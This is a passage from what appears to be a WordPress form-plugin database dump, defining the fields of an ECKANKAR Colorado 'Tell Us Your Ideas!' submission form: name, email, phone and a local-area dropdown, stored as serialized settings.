left'),(2367,77,'show_help','0','show_help','0'),(2368,77,'help_text','','help_text',''),(2369,77,'show_desc','0','show_desc','0'),(2370,77,'desc_pos','none','desc_pos','none'),(2371,77,'desc_text','','desc_text',''),(2372,77,'processing_label','Processing','processing_label','Processing'),(2373,77,'element_class','','element_class',''),(2374,77,'key','submit_31','key','submit_31'),(2375,77,'container_class','','container_class',''),(2376,77,'parent_id','8','parent_id','8'),(2377,78,'objectType','Field','objectType','Field'),(2378,78,'objectDomain','fields','objectDomain','fields'),(2379,78,'editActive','','editActive',''),(2380,78,'order','1','order','1'),(2381,78,'type','html','type','html'),(2382,78,'label','Text','label','Text'),(2383,78,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2384,78,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Tell Us Your Ideas!</span></span></span></strong></span></h3>\r\n<span style=\"font-size: 12pt;\"><span style=\"color: #23507d;\"><strong>Do you have an idea to help further the efforts of ECKANKAR in Colorado?</strong></span></span>\r\n\r\nYour ideas are of great value. This process exists for the sole purpose of bringing projects to the fore and putting them into action. If your idea is fully formed but you are unsure about how and where to implement it, we still wish to hear the idea and will do all we can to help you bring it to fruition. Just tell us some details and we will forward your proposal to the right people.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Tell Us Your Ideas!</span></span></span></strong></span></h3>\r\n<span style=\"font-size: 12pt;\"><span style=\"color: #23507d;\"><strong>Do you have an idea to help further the efforts of ECKANKAR in Colorado?</strong></span></span>\r\n\r\nYour ideas are of great value. This process exists for the sole purpose of bringing projects to the fore and putting them into action. If your idea is fully formed but you are unsure about how and where to implement it, we still wish to hear the idea and will do all we can to help you bring it to fruition. Just tell us some details and we will forward your proposal to the right people.'),(2385,78,'desc_el','div','desc_el','div'),(2386,78,'show_desc','0','show_desc','0'),(2387,78,'desc_pos','none','desc_pos','none'),(2388,78,'desc_text','','desc_text',''),(2389,78,'element_class','','element_class',''),(2390,78,'default','<p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Tell Us Your Ideas!</span></span></span></strong></span></h3>\n<span style=\"font-size: 12pt;\"><span style=\"color: #23507d;\"><strong>Do you have an idea to help further the efforts of ECKANKAR in Colorado?</strong></span></span>\n\n<p></p><p>Your ideas are of great value. This process exists for the sole purpose of bringing projects to the fore and putting them into action. If your idea is fully formed but you are unsure about how and where to implement it, we still wish to hear the idea and will do all we can to help you bring it to fruition. Just tell us some details and we will forward your proposal to the right people.</p>','default','<p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Tell Us Your Ideas!</span></span></span></strong></span></h3>\n<span style=\"font-size: 12pt;\"><span style=\"color: #23507d;\"><strong>Do you have an idea to help further the efforts of ECKANKAR in Colorado?</strong></span></span>\n\n<p></p><p>Your ideas are of great value. This process exists for the sole purpose of bringing projects to the fore and putting them into action. If your idea is fully formed but you are unsure about how and where to implement it, we still wish to hear the idea and will do all we can to help you bring it to fruition. Just tell us some details and we will forward your proposal to the right people.</p>'),(2391,78,'key','html_238','key','html_238'),(2392,78,'container_class','','container_class',''),(2393,78,'parent_id','9','parent_id','9'),(2394,79,'objectType','Field','objectType','Field'),(2395,79,'objectDomain','fields','objectDomain','fields'),(2396,79,'editActive','','editActive',''),(2397,79,'order','2','order','2'),(2398,79,'type','textbox','type','textbox'),(2399,79,'def_id','6','def_id','6'),(2400,79,'label','First Name','label','First Name'),(2401,79,'label_pos','above','label_pos','above'),(2402,79,'mask','','mask',''),(2403,79,'datepicker','0','datepicker','0'),(2404,79,'first_name','1','first_name','1'),(2405,79,'last_name','0','last_name','0'),(2406,79,'from_name','0','from_name','0'),(2407,79,'user_info_field_group','1','user_info_field_group','1'),(2408,79,'show_help','0','show_help','0'),(2409,79,'help_text','','help_text',''),(2410,79,'calc_auto_include','0','calc_auto_include','0'),(2411,79,'calc_option','0','calc_option','0'),(2412,79,'placeholder','','placeholder',''),(2413,79,'user_address_1','','user_address_1',''),(2414,79,'user_address_2','','user_address_2',''),(2415,79,'user_city','','user_city',''),(2416,79,'user_zip','','user_zip',''),(2417,79,'user_phone','','user_phone',''),(2418,79,'user_email','','user_email',''),(2419,79,'disable_input','0','disable_input','0'),(2420,79,'input_limit','','input_limit',''),(2421,79,'input_limit_type','char','input_limit_type','char'),(2422,79,'input_limit_msg','','input_limit_msg',''),(2423,79,'user_state','0','user_state','0'),(2424,79,'autocomplete_off','0','autocomplete_off','0'),(2425,79,'num_sort','0','num_sort','0'),(2426,79,'admin_label','','admin_label',''),(2427,79,'user_info_field_group_name','','user_info_field_group_name',''),(2428,79,'user_info_field_group_custom','','user_info_field_group_custom',''),(2429,79,'show_desc','0','show_desc','0'),(2430,79,'desc_pos','none','desc_pos','none'),(2431,79,'desc_text','','desc_text',''),(2432,79,'element_class','','element_class',''),(2433,79,'required','1','required','1'),(2434,79,'key','textbox_239','key','textbox_239'),(2435,79,'default','','default',''),(2436,79,'container_class','one-half first','container_class','one-half first'),(2437,79,'manual_key','','manual_key',''),(2438,79,'custom_mask','','custom_mask',''),(2439,79,'parent_id','9','parent_id','9'),(2440,80,'objectType','Field','objectType','Field'),(2441,80,'objectDomain','fields','objectDomain','fields'),(2442,80,'editActive','','editActive',''),(2443,80,'order','3','order','3'),(2444,80,'type','lastname','type','lastname'),(2445,80,'def_id','7','def_id','7'),(2446,80,'label','Last Name','label','Last Name'),(2447,80,'label_pos','above','label_pos','above'),(2448,80,'mask','','mask',''),(2449,80,'datepicker','0','datepicker','0'),(2450,80,'first_name','0','first_name','0'),(2451,80,'from_name','0','from_name','0'),(2452,80,'user_info_field_group','1','user_info_field_group','1'),(2453,80,'show_help','0','show_help','0'),(2454,80,'help_text','','help_text',''),(2455,80,'calc_auto_include','0','calc_auto_include','0'),(2456,80,'calc_option','0','calc_option','0'),(2457,80,'placeholder','','placeholder',''),(2458,80,'user_address_1','','user_address_1',''),(2459,80,'user_address_2','','user_address_2',''),(2460,80,'user_city','','user_city',''),(2461,80,'user_zip','','user_zip',''),(2462,80,'user_phone','','user_phone',''),(2463,80,'user_email','','user_email',''),(2464,80,'disable_input','0','disable_input','0'),(2465,80,'input_limit','','input_limit',''),(2466,80,'input_limit_type','char','input_limit_type','char'),(2467,80,'input_limit_msg','','input_limit_msg',''),(2468,80,'user_state','0','user_state','0'),(2469,80,'autocomplete_off','0','autocomplete_off','0'),(2470,80,'num_sort','0','num_sort','0'),(2471,80,'admin_label','','admin_label',''),(2472,80,'user_info_field_group_name','','user_info_field_group_name',''),(2473,80,'user_info_field_group_custom','','user_info_field_group_custom',''),(2474,80,'show_desc','0','show_desc','0'),(2475,80,'desc_pos','none','desc_pos','none'),(2476,80,'desc_text','','desc_text',''),(2477,80,'element_class','','element_class',''),(2478,80,'required','1','required','1'),(2479,80,'key','lastname_240','key','lastname_240'),(2480,80,'default','','default',''),(2481,80,'container_class','one-half','container_class','one-half'),(2482,80,'parent_id','9','parent_id','9'),(2483,81,'objectType','Field','objectType','Field'),(2484,81,'objectDomain','fields','objectDomain','fields'),(2485,81,'editActive','','editActive',''),(2486,81,'order','4','order','4'),(2487,81,'type','email','type','email'),(2488,81,'def_id','14','def_id','14'),(2489,81,'label','Email','label','Email'),(2490,81,'label_pos','above','label_pos','above'),(2491,81,'mask','','mask',''),(2492,81,'datepicker','0','datepicker','0'),(2493,81,'first_name','0','first_name','0'),(2494,81,'last_name','0','last_name','0'),(2495,81,'from_name','0','from_name','0'),(2496,81,'user_address_1','0','user_address_1','0'),(2497,81,'user_address_2','0','user_address_2','0'),(2498,81,'user_city','0','user_city','0'),(2499,81,'user_zip','0','user_zip','0'),(2500,81,'user_phone','0','user_phone','0'),(2501,81,'user_info_field_group','1','user_info_field_group','1'),(2502,81,'show_help','0','show_help','0'),(2503,81,'help_text','','help_text',''),(2504,81,'calc_auto_include','0','calc_auto_include','0'),(2505,81,'calc_option','0','calc_option','0'),(2506,81,'placeholder','','placeholder',''),(2507,81,'disable_input','0','disable_input','0'),(2508,81,'input_limit','','input_limit',''),(2509,81,'input_limit_type','char','input_limit_type','char'),(2510,81,'input_limit_msg','','input_limit_msg',''),(2511,81,'user_state','0','user_state','0'),(2512,81,'autocomplete_off','0','autocomplete_off','0'),(2513,81,'num_sort','0','num_sort','0'),(2514,81,'admin_label','','admin_label',''),(2515,81,'user_info_field_group_name','','user_info_field_group_name',''),(2516,81,'user_info_field_group_custom','','user_info_field_group_custom',''),(2517,81,'show_desc','0','show_desc','0'),(2518,81,'desc_pos','none','desc_pos','none'),(2519,81,'desc_text','','desc_text',''),(2520,81,'element_class','','element_class',''),(2521,81,'required','1','required','1'),(2522,81,'key','email_241','key','email_241'),(2523,81,'default','','default',''),(2524,81,'container_class','one-half first','container_class','one-half first'),(2525,81,'parent_id','9','parent_id','9'),(2526,82,'objectType','Field','objectType','Field'),(2527,82,'objectDomain','fields','objectDomain','fields'),(2528,82,'editActive','','editActive',''),(2529,82,'order','5','order','5'),(2530,82,'type','phone','type','phone'),(2531,82,'def_id','15','def_id','15'),(2532,82,'label','Phone','label','Phone'),(2533,82,'label_pos','above','label_pos','above'),(2534,82,'mask','(999) 999-9999','mask','(999) 999-9999'),(2535,82,'datepicker','0','datepicker','0'),(2536,82,'first_name','0','first_name','0'),(2537,82,'last_name','0','last_name','0'),(2538,82,'from_name','0','from_name','0'),(2539,82,'user_address_1','0','user_address_1','0'),(2540,82,'user_address_2','0','user_address_2','0'),(2541,82,'user_city','0','user_city','0'),(2542,82,'user_zip','0','user_zip','0'),(2543,82,'user_email','0','user_email','0'),(2544,82,'user_info_field_group','1','user_info_field_group','1'),(2545,82,'show_help','0','show_help','0'),(2546,82,'help_text','','help_text',''),(2547,82,'calc_auto_include','0','calc_auto_include','0'),(2548,82,'calc_option','0','calc_option','0'),(2549,82,'placeholder','','placeholder',''),(2550,82,'disable_input','0','disable_input','0'),(2551,82,'input_limit','','input_limit',''),(2552,82,'input_limit_type','char','input_limit_type','char'),(2553,82,'input_limit_msg','','input_limit_msg',''),(2554,82,'user_state','0','user_state','0'),(2555,82,'autocomplete_off','0','autocomplete_off','0'),(2556,82,'num_sort','0','num_sort','0'),(2557,82,'admin_label','','admin_label',''),(2558,82,'user_info_field_group_name','','user_info_field_group_name',''),(2559,82,'user_info_field_group_custom','','user_info_field_group_custom',''),(2560,82,'show_desc','0','show_desc','0'),(2561,82,'desc_pos','none','desc_pos','none'),(2562,82,'desc_text','','desc_text',''),(2563,82,'element_class','','element_class',''),(2564,82,'required','1','required','1'),(2565,82,'key','phone_242','key','phone_242'),(2566,82,'default','','default',''),(2567,82,'container_class','one-half','container_class','one-half'),(2568,82,'manual_key','','manual_key',''),(2569,82,'custom_mask','','custom_mask',''),(2570,82,'parent_id','9','parent_id','9'),(2571,83,'objectType','Field','objectType','Field'),(2572,83,'objectDomain','fields','objectDomain','fields'),(2573,83,'editActive','','editActive',''),(2574,83,'order','6','order','6'),(2575,83,'type','listselect','type','listselect'),(2576,83,'label','Your Local Area','label','Your Local Area'),(2577,83,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2578,83,'label_pos','above','label_pos','above'),(2579,83,'list_type','dropdown','list_type','dropdown'),(2580,83,'multi_size','5','multi_size','5'),(2581,83,'list_show_value','1','list_show_value','1'),(2582,83,'list','a:0:{}','list','a:0:{}'),(2583,83,'user_info_field_group','','user_info_field_group',''),(2584,83,'calc_auto_include','0','calc_auto_include','0'),(2585,83,'user_state','0','user_state','0'),(2586,83,'num_sort','0','num_sort','0'),(2587,83,'admin_label','','admin_label',''),(2588,83,'show_help','0','show_help','0'),(2589,83,'help_text','','help_text',''),(2590,83,'show_desc','0','show_desc','0'),(2591,83,'desc_pos','none','desc_pos','none'),(2592,83,'desc_text','','desc_text',''),(2593,83,'element_class','','element_class',''),(2594,83,'required','1','required','1'),(2595,83,'options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 